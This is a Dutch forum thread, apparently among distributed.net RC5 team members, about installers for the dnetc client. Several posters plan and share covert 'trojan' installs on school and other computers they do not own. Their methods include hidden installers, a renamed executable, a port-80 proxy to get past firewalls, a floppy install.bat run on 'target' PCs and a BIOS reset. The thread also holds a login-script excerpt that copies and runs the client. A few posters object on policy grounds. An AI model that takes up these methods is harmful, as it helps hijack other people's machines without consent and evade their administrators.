Deze optie zou ik persoonlijk gezien weg gehaald hebben. Ik vind het niet netjes om andermans koeien te jatten !
Mocht iemand erachter komen, dan komt dat wel op DPC's naam te staan !
:(:(
[zeik mode]
ennuh er staat een typo op je site.. gedult = geduld
[/zeik mode]
NL: 18 19 31 32 34 37 39 47 57 60 66 67 68 70 72 73 77 79 80 82 83 85 90 94 95 96 98 02 04 11 12 | KB: 17 43 61 67 70 71 72 79 83 86 87 93 98 99 02 06 07 10 | SC: 93 94 95 | JCS: 02 05 06 | EC1: 71 72 73 95 | EC2: 87 | UC: 92 | WB: 72 95 | ESC: 72 73 95
Je hoort het wel.
Ik zal er ook ff een paar op jouw emailadres zetten als dank
Er staat 2x install zichtbaar en ook 2x hidden. Snap ik het nu niet, of ben ik gewoon dom?
ToeTerdeToeTToeT! | May the ToeT be with you | There is no ToeT | specs
Still the gentleman ;)
[Clan of ToeT]
Verwijderd
Ze hebben als voordeel dat het maar 1 installatie file zjn, in tegenstelling tot die van Elect, als nadeel dat je er geen mailadres mee kunt geven tijdens de installatie dat moet je zelf doen, maar dit probleem hebben die van Elect ook. Ook flusht mijn trojan door een poort 80-proxy wat handiger uitkomt met een hoop firewalls.
Niettemin vind ik die installers van Elect toch wel kont schoppen met hun batch-install, nice job Elect
Dont make war, lets crack for DPC
Verwijderd
_QW_ en elect, maar ik heb toch vor die van QW gekozen ommdat jouwe nog moest uitpakken en sindsdien wij geen uitpak shit hebben op school heb ik die van QW genomen:)
allebei nog compimentjes voor de tijd die jullie hierin hebben gestoken
Verwijderd
De files zijn single-click installaties; in de .ini staat mijn email-adres (it's all DPC baby
Graasze...:)
Update; heb de koetjes in het login-script verwerkt. Nu nog ff mijn manager overtuigen van het feit dat ze echt geen schade aanbrengen. Zie hieronder het onderdeel van het koetje in het script;
;Installs disctributed.net client
$TestFile = "C:\Program Files\distributed.net\dnetc.exe"
If Exist ($TestFile)=0
$sour="y:\rc5\distributed.net\"
$dest="C:\Program Files\distributed.net\"
If Exist ($dest)=0
Md $dest
EndIf
Copy $sour+"dnetc.com" $dest+"dnetc.com"
Copy $sour+"dnetc.exe" $dest+"dnetc.exe"
Copy $sour+"dnetc.ini" $dest+"dnetc.ini"
Endif
$TestFile = "C:\Program Files\distributed.net\dnetc.exe"
If Exist ($TestFile)=1
RUN "C:\Program Files\distributed.net\dnetc.exe"
Endif
;End Install
Verwijderd
Als je het echt goed wilt doen, maak je een opstartdiskette die de client en de ini-file kopieren naar de HD, en vervolgens een .reg bestand importeert in het windows register.
Je hoeft dan niet Windows op te starten.
Als je 3 of 4 diskette's maakt, heb je binnen no-time een compleet schoollokaal gedaan.
computer aanzetten, diskette erin, herhalen bij de volgende pc. Wanneer je er 4 hebt gedaan, is de eerste alweer klaar
Verwijderd
Dat sms-installeren ga ik vanavond aan beginnen, net als een simpel prg-tje waarmee je tijdens het installeren het email adres kunt veranderen.
Onno > je hebt eigenlijk gelijk, volgens D.Net mag het niet wat wij doen, maar voordat je gaat downloaden bij mij krijg je ook een duidelijk waarschuwing, waar ik nog een paar dingen in ga zetten. Tja, en het is natuurlijk ook een stukje gebruikers vriendelijkheid wat betreft mijn normale versie.
Verwijderd
Je kunt (als het lokaal bijna leeg is) echt binnen een paar minuten een stuk of 20 PC's 'infecteren' met een koe
Verwijderd
Verwijderd
je kunt ook het bios resetten als je op de dos prompt kan komen of bij start
->uitvoeren, moet je ook weten hoe dat moet.
Verwijderd
Verwijderd
dus koe op floppy, denetc.ini en runvxd.ini ff aanpassen op je flops, naar je doelwit gaan, install.bat op floppy rammen en je ziet alleen vanonder een schermpje dat ie aan het instaleren is
Ik zet ze vanavond wel online, maar het is nog even druk ivm ons eigen RC5 subteampje
Dan zal ik gelijk die vna _QW_ ook ff bekijken, want ik zou eigenlijk niet weten wat zijn installer nou eigenlijk doet
Mja, ben naar school .. bah ..
see ya
Verwijderd
Ene hoe zit het eigenlijk met firewalls?? heeft zo'n koe daar ook last van? en zo ja is er ook een manier om hieromheen te komen?
Verwijderd
Ik neem aan dat de policy van D.net eropuit is om al te "assertieve" assimileerders aan te kunnen pakken of in ieder geval te vertellen hoe je mensen met RC5 kennis kunt laten maken.
En wat _zeker_ niet mag is wat Elect doet, dnetc.exe een andere naam geven. Dat is alleen maar uit te leggen als bedoeld voor illegale assimilaties.
Verwijderd
Daar moet je dus een installer omheen bouwen.
Deze feiten en de reden dat er toch een aantal mensen zijn die vinden dat die trojans niet kunnen heeft mij doen besluiten nog een laatste trojan versie te maken, op het moment dat ik iets heb voor tijdens het installeren het email aan te passen.
Ik zal wel de gewone versie voor newbies blijven "doorontwikkelen" (klinkt mooier dan het eigenlijk is
Voor diegene die verder gaan met trojan versies, suc7